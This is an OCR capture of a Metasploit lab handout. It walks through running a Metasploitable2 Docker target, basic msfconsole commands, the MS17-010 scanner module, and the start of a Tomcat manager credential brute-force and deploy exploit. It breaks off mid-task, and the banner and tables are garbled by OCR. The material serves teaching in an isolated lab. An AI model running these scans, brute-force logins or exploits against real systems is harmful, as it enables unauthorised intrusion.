metasploit lab details overview or deliverable overview with data obta
Search for question
Question
Metasploit Lab
✓ Details
Overview | Deliverable
Overview
With data obtained from scanning you can attempt to exploit vulnerabilities discovered.
Tools Used
• Kali / Linux or OS (preferably Linux/Unix based system)
Metasploit Framework
Armitage
Metasploitable2
●
• Docker
Target:
Metasploit Lab
Metasploitable2 Docker container (172.17.0.0/24 network)
Purpose
The aim of this lab is to develop and execute exploits against a remote machine and test its vulnerabilities using Metasploit
1/11 2/20/24, 8:58 PM
Tasks | Lab Requirements
Metasploit Lab
Task0 Setup the environment
We will be installing the docker container engine on the Kali Linux or equivalent Virtual Machine (VM). Then downloading and running the
Metasploitable2 container within the VM.
1. To start you will need to update your packages on your Kali VM and install the docker.io package
sudo apt-get install docker.io -y
2. Download, install, and run the Metasploitable2 machine
sudo docker run -it tleemcjr/metasploitable2:latest sh -c "/bin/services.sh && bash"
3. When the docker is done pulling the image, it will start the container in interactive mode so you will want to keep the terminal open. You can run
the ifconfig command within that terminal to verify that the IP is set. It should be 172.17.0.2
4. Ensure your VM and the container can communicate with each other by pinging the containers IP from another terminal.
Deliverables:
• Provide a screenshot showing that the two systems can ping each other.
Task 1 Using Metasploit Start the tool
We are going to start exploring the Metasploit console and looking into a few of the various basic commands you can perform.
1. To start Metasploit, open a terminal on the Linux VM and issue the below command should give you roughly a result as seen in the image.
Metasploit does have a various amount of banners that it will load so the image may not always look similar to the one provided.
msfconsole
2/11 2/20/24, 8:58 PM
2.
+
MMMN$
MMMN MMMMM
MMMN MMMMMMMN
MMMN MMMMMMMMMI imml
MMMNI MMMMM
MMMNI MMMM
MMM
MMMNI MMMMM MMMMMMM
MMMMM
MMMM
MMMNI MMMMM MM IMMMM MMMMM
MMMM
MMMNI MMMNM MMMMMMM
MMMMM
MMMM
MMMNI WMMMM MMMMMMM
MMMM# JMMMM
MMMMR ?MMNM
MMMMM dMMMM
MMMMNM ?MMM
MMMMMMN ?MM
MMMM dMMMMM
MM? NMMMMMN
JMMMMMNMI
eMMMMMNMMN
MMMMMMMNe
MMMMMMNMMNMMNM
+
-(kaliG kali)-[~]
msfconsole
+
IMMMMMNM,
JMNMMMMMNX
MMMMMM
MMMMMMMMMM
msf6 >
VMMMM
MMMMM JMMMM
JMMMM
JMMMM
jMMMM
MMMM
NMMMMMMM
IMMM
MNMMNMMMMm+ .. +MMNMMNMNMMNMMNMM
https://metasploit.com
=[metasploit v6.2.36-dev
=[ 2277 exploits
=[ 951 payloads 45 encoders - 11 nops
-=[ 9 evasion
1194 auxiliary - 408 post
Metasploit tip: Save the current environment with the
save command, future console restarts will use this
environment again
Metasploit Documentation: https://docs.metasploit.com/
Metasploit Lab
3. As we can see there are plenty of items in each of the modules. We can use the show command to view the contents of each module. So you
could use the command as shown below to see all the payloads in the payloads module.
show payloads
4. We can also use the search command to search through the modules. This may be useful for finding specific payloads during your exploit or
finding an auxiliary module that you want to use. Let's look for a
5. We will use the search option to search for the Eternalblue attack (ms17_010). We should see some exploits and auxiliary modules that are
related to our search. You should also note that at the bottom we can interact with these modules by name or the index number.
3/11 2/20/24, 8:58 PM
msf6 > search ms17_010
Matching Modules
n
# Name
0 exploit/windows/smb/ms17_010_eternalblue
1 exploit/windows/smb/ms17_010_psexec
2 auxiliary/admin/smb/ms17_010_command
3 auxiliary/scanner/smb/smb_ms17_010
Name
CHECK_ARCH true
CHECK_DOPU true
CHECK_PIPE false
NAMED_PIPES
RHOSTS
RPORT
Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/smb/smb_ms17_010
6. Use the below command to view the info about the module number 3. It will provide you details regarding items like the name, module, rank,
options, and description.
info 3
Current Setting
SMBDomain
SMBPass
SMBUser
THREADS
7. Below you will see us using the command use 3 to go into that module and our prompt should change. Then after that running a show options
command will get us a list of the options. Do not for the options, as indicated by the red boxes, that the items marked as yes in the Required
column must be set.
msf6 > use 3
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
med_pipes.txt
Disclosure Date Rank
2017-03-14
2017-03-14
2017-03-14
445
no
no
no
/usr/share/metasploit-framework/data/wordlists/na yes
1
average Yes
normal Yes
normal No
normal No
set RHOSTS 192.168.1.22
Metasploit Lab
Check Description
MS17-010 Eternal Blue SMB Remote Windows Kernel Pool Corruption
MS17-010 Eternal Romance/EternalSynergy/Eternal Champion SMB Remote Windows Code Execution
MS17-010 Eternal Romance/EternalSynergy/EternalChampion SMB Remote Windows Command Executio
MS17-010 SMB RCE Detection
yes
yes
no
no
no
yes
Required Description
Check for architecture on vulnerable hosts
Check for DOUBLEPULSAR on vulnerable hosts
Check for named pipe on vulnerable hosts
List of named pipes to check
The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
The SMB service port (TCP)
The Windows domain to use for authentication
The password for the specified username
The username to authenticate as
The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/smb/smb_ms17_010) >
8. To set a item you can use the set command and the name of what you want to set. Once settings the options it's good practice to use the show
options command again to verify appropriate options were set properly (typos / wrong value set). Below is an example of how you would set the
RHOSTS name for the module shown previously for an example IP of 192.168.1.22.
9. After every thing has been verified, you should use the command run to run the auxiliary module.
4/11 2/20/24, 8:58 PM
Metasploit Lab
10. Within the MSF console you could even issue the help command and it will give you additional details of commands you can run. For this
example it will give us some of the basic commands but even some commands related to the auxiliary module we are currently using. Below is a
segment pulled from after using the help command that's related to the current module.
Auxiliary Commands
Command
check
exploit
rcheck
recheck
reload
rerun
rexploit
Description
Check to see if a target is vulnerable
This is an alias for the run command
Reloads the module and checks if the target is vulnerable
This is an alias for the rcheck command
msfconsole
Reloads the auxiliary module
Reloads and launches the auxiliary module
This is an alias for the rerun command
Launches the auxiliary module
run
11. That's it, this section is complete
Task2: Exploits with MSF and Armitage
Metasploit Framework
Before starting you should ensure that the Metasploitable machine has started and running.
For this part we have discovered that there is a Tomcat Manager Application Deployer exploit we can run to try and exploit the system.
1. Start Metasploit by opening a terminal and issuing the below command if you don't already have MSF running.
2. Search for an Aux module that will try to login to the Tomcat Application Manager
3. Select the module by name or by the ID number with the use command
4. Show the options to se what needs to be set. You will need to update and set the following options:
• RHOSTS to the IP of the target system
o RPORT to the tomcat service listening on port 8180
5. Once options are verified, issue the run command to start the scan
6. You will see a bunch of usernames and passwords that it tries. you will have to scroll up and you will see the username and password that stated
there was a Login Successful. Take note of this information because it will be used for the exploit later.
7. Now search for the exploit module tomcat deploy
8. Use the module for the exploit that is exploit multi http tomcat mgr deploy
5/11